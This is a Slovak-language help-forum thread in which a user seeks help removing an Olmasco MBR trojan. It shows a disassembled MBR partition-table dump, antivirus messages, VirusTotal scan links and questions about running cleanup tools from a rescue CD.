0x01B7    f6ba 41bb       IDIV BYTE [BP+SI-0x44bf]   
0x01BB    41              INC CX   
0x01BC    0000            ADD [BX+SI], AL   
0x01BE    8001 01         ADD BYTE [BX+DI], 0x1   
0x01C1    0007            ADD [BX], AL   
0x01C3    fe              DB 0xfe   
0x01C4    ff              DB 0xff   
0x01C5    ff              DB 0xff   
0x01C6    3f              AAS   
0x01C7    0000            ADD [BX+SI], AL   
0x01C9    00f3            ADD BL, DH   
0x01CB    6b4f 12 00      IMUL CX, [BX+0x12], 0x0   
0x01CF    00c1            ADD CL, AL   
0x01D1    ff0f            DEC WORD [BX]   
0x01D3    fe              DB 0xfe   
0x01D4    ff              DB 0xff   
0x01D5    ff32            PUSH WORD [BP+SI]   
0x01D7    6c              INSB   
0x01D8    4f              DEC DI   
0x01D9    12ce            ADC CL, DH   
0x01DB    2bf3            SUB SI, BX   
0x01DD    1200            ADC AL, [BX+SI]   
0x01DF    0000            ADD [BX+SI], AL   
0x01E1    0000            ADD [BX+SI], AL   
0x01E3    0000            ADD [BX+SI], AL   
0x01E5    0000            ADD [BX+SI], AL   
0x01E7    0000            ADD [BX+SI], AL   
0x01E9    0000            ADD [BX+SI], AL   
0x01EB    0000            ADD [BX+SI], AL   
0x01ED    0000            ADD [BX+SI], AL   
0x01EF    0000            ADD [BX+SI], AL   
0x01F1    0000            ADD [BX+SI], AL   
0x01F3    0000            ADD [BX+SI], AL   
0x01F5    0000            ADD [BX+SI], AL   
0x01F7    0000            ADD [BX+SI], AL   
0x01F9    0000            ADD [BX+SI], AL   
0x01FB    0000            ADD [BX+SI], AL   
0x01FD    0055 aa         ADD [DI-0x56], DL
po tomto teste mi vybehol ten virus a uz mam aj umiestnenie ale len som si to opísal a nestihol som ani screen spravit tak dufam ze to dobrre napisem
c:/documents and settings/monicka/desktop/Dump_Hdd0_DR0.old.mbr
infiltrace
win 32/olmasco.x trojsky kun
info
vylecen smazanim ulozen do karanteny
a na plochu mi to ulozilo subor Dump_Hdd0_DR0.old
http://support.kaspersky.com/downloads/ ... killer.exe toto som si stiahol ale nejde mi to spustit

a taktiez RogueKiller mi nejde spustit

Re: virus nejde odstranit antivirom

Napsal: 18 črc 2012 16:51
od hunterwx
no tak dufam ze uz teraz to bude dobre a ze som to spravne pochopil takze ked mi tam vybehla tato tabulka File already analysed

This file was already analysed by VirusTotal on 2011-10-18 09:33:47.

Detection ratio: 1/41

You can take a look at the last analysis or analyse it again now.
dal som reanalysed tak si to myslel ? dufam ze ano inak som ta asi uplne blbo pochopil a odpust mi moh hlupi pristup k tomu

c:\windows\explorer.exe
https://www.virustotal.com/file/8c7e8bc ... 342625505/


c:\windows\regedit.exe
https://www.virustotal.com/file/06cb6f4 ... 342625827/

c:\windows\system32\xcdzip32.dll
tato zlozka mi nejako nejde inak oskenovat stale tam dava 9 mesiacov aj ked som dal znova a znova stale to iste co aj predtym :(
https://www.virustotal.com/file/cf84342 ... 342626481/

c:\windows\Installer\{90120000-0030-0000-0000-0000000FF1CE}\oisicon.exe
https://www.virustotal.com/file/094a403 ... /analysis/
a nie nemam kde bohuzial vypalit cd/dvd bolo by to treba ? mam doma len tento pc z ktoreho teraz pisem ale pripadne by som siel nejakemu kamosovi

Re: virus nejde odstranit antivirom

Napsal: 19 črc 2012 07:13
od hunterwx
este sa opytam radsej tu zlozku mam vytvorit na ploche a je jedno ako ju pomenujem alebo sa ma volat tak isto ako ten program??

Re: virus nejde odstranit antivirom

Napsal: 19 črc 2012 13:09
od hunterwx
teraz ao som zapol pc opat sa mi tam ukazala ta infiltracia a pise mi to
infiltrace nalezena v pameti
objekt-
operacni pamet-svchost.exe(1564)
infiltrace
warianta infiltrace win32/olmasco. o trojsky kun
info nelze lecit
a vytvoril som si na ploche slozku pomenoval som si ju mbrscan potom som spustil scan s tym ze v options som zaskrtol opat vsetko a dal report a tuna su tie subory ak som to nahodou spravil zle napis ja to spustim tak ako napises znova

Re: virus nejde odstranit antivirom

Napsal: 19 črc 2012 13:16
od hunterwx
tuna je to vlozene tak ze som tam nic neupravoval len som spustil hned scan ako sa to otvorilo

a to CD uz mam vypalene

Re: virus nejde odstranit antivirom

Napsal: 19 črc 2012 14:21
od hunterwx
ja tu ziadnu prilohu nemam

Re: virus nejde odstranit antivirom

Napsal: 19 črc 2012 14:26
od hunterwx
a este otazka ked mi predtym ten tdsskiller nesiel ani otvorit teraz pojde?

Re: virus nejde odstranit antivirom

Napsal: 19 črc 2012 14:32
od hunterwx
a kde najdem ten mbrfix? a ako ze sa spusti prostredi ale z mechaniky?

cize ak som dobre pochopil mam restartovat pc po tom ako rozbalim henten subor na c a vlozit do mechaniky to cd co som vypalil? potom v programoch najist ten mbr fix a postupovat podla dalsieho navaodu

Re: virus nejde odstranit antivirom

Napsal: 19 črc 2012 14:40
od hunterwx
napisalo mi to ze system nemoze spustit zadany program skusim este raz ten restart ani potom to nejde

Re: virus nejde odstranit antivirom

Napsal: 19 črc 2012 14:49
od hunterwx
mne to otvorilo klasicky moju plochu ako vzdy potom som otvoril to cd dal som ten soft otvoril sa mi prikazovy riadok kde som skopiroval ten prikaz od teba lebo ked som otvoril to cd a dal som reatogo ako nacitat tak mi to nic nerobilo uz mi to otvorilo ale nemam to ako ty plochu ale len take okno a tam na vyber ale nemam tam to mbrfix este to treba nejako doinstalovat alebo ?

Re: virus nejde odstranit antivirom

Napsal: 19 črc 2012 14:56
od hunterwx
lenze mne to cd nabootovat nechce ja ho dam do mechaniky a nerobi to nic

Re: virus nejde odstranit antivirom

Napsal: 19 črc 2012 15:04
od hunterwx
to som sa chcel prave spytat ci to mam zapat na prvy boot z cd oki idem nato
Všechny časy jsou v UTC+01:00
Stránka 1 z 2

Založeno na phpBB® Forum Software © phpBB Limited

Český překlad – phpBB.cz